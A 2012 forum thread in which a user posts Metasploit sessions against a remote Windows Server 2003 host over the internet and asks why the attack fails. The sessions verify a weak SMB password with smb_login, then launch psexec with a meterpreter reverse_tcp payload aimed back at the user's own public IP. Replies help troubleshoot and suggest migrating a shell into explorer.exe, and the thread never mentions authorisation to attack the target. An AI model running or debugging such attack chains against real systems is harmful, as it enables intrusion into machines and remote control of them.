Can You Let Me Know What Is The Problem With This Exploit?

3 replies to this topic

#1 mbarakoda

Posted 10 October 2012 - 05:34 PM

Target OS: Windows 2003 SP2 EN
Target public IP: XX.XX.XX.XX
Target open port: 445
My OS: Windows 7
My public IP: YY.YY.YY.YY
My local IP: 192.168.2.42
My router: SMC

Due to the fact that the target is not on the same LAN, and the attack will be over the internet, I started by setting up port forwarding in the router settings as follows:
Name:AUTH - Protocol:TCP/UDP - WAN Port:4444 - Server Host Port:4444 - Server IP Address 192.168.2.42

I installed Metasploit and started by checking whether the credentials are valid or not by running scanner/smb/smb_login as follows:

msf> use scanner/smb/smb_login
msf auxiliary(smb_login) > set rhosts XX.XX.XX.XX
rhosts => XX.XX.XX.XX
msf auxiliary(smb_login) > set smbuser root
smbuser => root
msf auxiliary(smb_login) > set smbpass password
smbpass => password
msf auxiliary(smb_login) > run

[*] XX.XX.XX.XX:445 SMB - Starting SMB login bruteforce
[-] XX.XX.XX.XX - This system allows guest sessions with any credentials, these instances will not be reported.
[-] XX.XX.XX.XX:445 SMB - [1/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : (STATUS_LOGON_FAILURE)
[-] XX.XX.XX.XX:445 SMB - [2/3] - |WORKGROUP - FAILED LOGIN (Windows Server 2003 3790 Service Pack 2) root : root (STATUS_LOGON_FAILURE)
[*] Auth-User: "root"
[+] XX.XX.XX.XX:445|WORKGROUP - SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2) 'root' : 'password'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed



Then, after the login was successful, I tried to use exploit/windows/smb/psexec to exploit the server as follows:



msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost XX.XX.XX.XX
rhost => XX.XX.XX.XX
msf exploit(psexec) > set smbuser root
smbuser => root
msf exploit(psexec) > set smbpass password
smbpass => password
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set lhost YY.YY.YY.YY
lhost => YY.YY.YY.YY
msf exploit(psexec) > set lport 4444
lport => 4444
msf exploit(psexec) > exploit

[-] Handler failed to bind to YY.YY.YY.YY:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Connecting to the server...
[*] Authenticating to XX.XX.XX.XX:445|WORKGROUP as user 'root'...
[*] Uploading payload...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)



But as you can see, the exploit failed although the credentials are valid and were confirmed above. Can you help me understand what's wrong with the above?

#2 Infiltrator

Posted 12 October 2012 - 07:49 AM

It could be that the vulnerability is already patched.
Regards,
Infiltrator


Currently studying for my CCE.

#3 digip

Posted 12 October 2012 - 08:52 AM

[-] Handler failed to bind to YY.YY.YY.YY:4444

What's running locally already on 4444?

Also, what OS is the target? Windows, or Linux running SMB? User root on a Windows box seems unlikely, whereas I could see it on a Linux machine running Samba, which if you think about it, I don't think psexec works on Linux as a payload, but I could be wrong.

If you got a shell popped, try migrating to a process like explorer.exe and then see where or what your commands are/can do.

#4 Infiltrator

Posted 15 October 2012 - 10:42 PM

I found something related to your problem, I don't know if you have seen it or not, but here's the URL.

http://www.offensive...c_Pass_The_Hash
Regards,
Infiltrator
